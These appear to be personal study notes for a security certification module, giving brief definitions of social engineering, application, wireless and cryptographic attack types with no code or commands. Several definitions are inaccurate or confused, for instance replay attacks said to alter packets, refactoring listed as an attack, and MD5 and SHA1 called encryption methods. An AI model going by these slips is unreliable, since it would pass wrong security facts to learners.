Module 2. Comparing and Contrasting Attack Types
#
Social EngineeringA social engineer is someone who is a master of asking seemingly non-invasive or unimportant questions to gather information over time.
Some typical social engineering attacks are:
#
PhishingSome types of phishing are:
- Phishing: An attack via electronic communications posing as someone trustworthy.
- Speak Phishing: A targeted attack appearing to come from a trusted source, typically within the victims own company and from someone in a position of authority.
- Whaling: A specific attack targeting high-profile business executives.
#
VishingVoice Phishing.
Using social engineering techniques to obtain information but either in person or over the phone
Attackers pose as legitimate company, repair person, security personnel or someone of trust and could be internal or external to the company
#
Tailgatingfollowing someone into a build or badged area. This happens because people want to be helpful, be aware of people who are trying to look like they belong and maybe carrying a lot of items.
#
ImpersonationAs well as the act of impersonating a person, from a technical point of view there is the ability to capture packets, alter them and then place them back onto the network to look like legitimate packs.
Sequencing can help mitigate this, for example if a network transmission is received out of order or after a time out period the packets need to be re-submitted
#
Dumpster DivingThe removal of rubbish from bins that could reveal sensitive information.
Documentation that has sensitive or personally identifiable information should be disposed of securely
#
Shoulder SurfingThe act of watching over someones should while they enter sensitive information into a web page or application.
#
HoaxesA social engineering technique designed to trick the target into revealing sensitive information, these could be in the form of someone acting like a remote technician or employee, an interested party seeking employment or an angry customer filing a complaint.
#
Watering hole attackAn attacker may identify a less secure third party site that they have deduced company employees might ues, then attack that site to deploy the malware
#
Principles (Reasons for Effectiveness)#
AuthorityAuthority is a bad actor that appears to know what they are talking about or has special knowledge about the company, if the bad actor has this special information it may appear to give them a position of power.
#
Intimidationan actor can threaten negative actions, like releasing sensitive information
#
Consensus/Social ProofPeople are more likely to act when they believe they are in alignment with the larger group
#
Familiarity/LikingPeople like using or buying things they are already familiar with or like. An attacker can establish a common contact or friend so that the trust levels go up.
#
TrustPeople are more likely to act when tey trust the person or situation.
#
Scarcity/UrgencyTactics to elicit action by making the target think they have to act quickly to obtain a special deal
#
Application/Service Attacks#
DDoSGenerally a large scale denial of service attack, they can have the following components
- Botnets: a collection of hosts that can initiate the attacks and can be spread all over the internet, creating the distributed part of the attack
- Bot Herders: Someone that will try and infect vulnerable computers to add them to their botnet
- Control and Command (C&C) centers: The control device for the botnet
#
Replay AttackThis involves capturing packets, altering them and then adding them back into the network
#
Man-In-The-MiddleSimilar to a replay attack but may not be altering the packets, but just intercepting them.
#
Buffer OverflowAn attack that causes a system or app to crash and behave unexpectedly. One example is if an application wasn't written correctly and it didn't handle more data being written to the buffer than it can handle, and that extra data is written to a different memory block, that extra code could be executed when it normally would not be allowed.
#
SQL InjectionInvolves modifying the SQL query that is passed to the web application that can cause vulnerable web site to return queries from databases that could potentially contain usernames and passwords or cause the application to crash or provide remote access.
#
LDAP InjectionSimilar to SQL injection, but uses LDAP queries and when malicious queries can be passed through a vulnerability it may return user details from the LDAP service.
#
XML InjectionAnother form of injection but using XML
#
Cross Site Scripting (XSS) and Cross Site Request Forgery (XSRF)For XSS he browser runs malicious code because it was served from a site it trusts with XSRF the server performs an action because it was sent a request from a client it trusts.
#
Privilege EscalationObtaining elevated privileges on the target
#
ARP PoisoningAttackers send out spoofed ARP messages to associate their machine with another host and then intercepts data intended for another recipient.
#
Smurf Attack (Amplification)Victims IP address is spoofed and ping messages are broadcast to a network, then the return pings will flood the victims machine.
#
DNS PoisoningManipulating the data in a DNS servers cache to point to a different IP address.
#
Zero DayA vulnerability that has been discovered and exploited before the developer has a chance to issue a fix or patch
#
Pass the HashHarvesting a user's password has to authenticate to a remote server or service, usually the hash is obtained by sniffing the network.
#
Clickjackingtricking the user into performing unintended actions by clicking a concealed link.
#
Session HijackingItems used to validate a user's session are compromised and reused by a malicious person, like man in the middle attacks and sidejacking.
#
Typo Squatting and URL Hijackingsetting up domain names with mis-spellings of popular domains. The sites at these fraudulent sites will then be used to capture the users details.
#
ShimmingShim databases can be used to intercept requests and install code or patches
#
Refactoringmodifying an applications source code without changing the underlying functionality.
#
IP/MAC SpoofingMasquerading as another using their IP or MAC address
#
Wireless Attacks#
Replay Attackssniffing the network, then captures packets, modifies them and then added back on the wire.
#
IV AttackInitialization Vector Attack. When using older weaker encryption the the IV were short and would be repeated fairly quickly allow attacks to derive the IV and gain access. This is how WEP networks are cracked.
#
Rouge Access PointsUnauthorised access point that can be used for obtaining sensitive information. An evil twin is a rouge access point that uses the same SSID as a legitimate AP.
#
WPS AttackEasy push button connection option. However the shared pin is only 7 digits which can be brute force cracked in 3 - 5 hours
#
BluejackingThe sending of unauthorised messages or data to a victim's device. Sending a vCard which contains a message using OBEX (OBjectEXchange) protocol.
#
BluesnarfingThis involves pulling data from a victims device
#
NFCCan be used to steal data from a very nearby device.
#
DissociationAn attacker can create a DoS scenario by sending a spoofed dissociation request causing hosts to disconnect.
#
Cryptographic Attacks#
Brute Forceattempt to defeat encryption by trying every possible combination of passwords to passphrases.
#
Dictionary Attackusing words in a dictionary or defined set of possible words
#
Birthday AttackA brute force attack that works on the cryptographic phenomenon of has collisions
#
Rainbow Tablesprecomputed table of cryptographic hashes.
#
Online vs. Offline#
Collision AttackAttack that finds two inputs that have the same hash output
#
Downgrade Attackforcing a system to negotiate a lower quality method of communication, typically seen with legacy systems.
#
Known plain text / cyphertextIf both the plain text and cyphertext is know then the details can be used to reverse engineer the hash algorithm.
#
Weak ImplementationsCryptography is only as strong as the weakest link
- Don't use weak encryption methods like MD5 or SHA1
- Use NIST approved algorithms like AES or TDEA (NIST Special publication 800-57 Part 1: Recommendation for Key Management)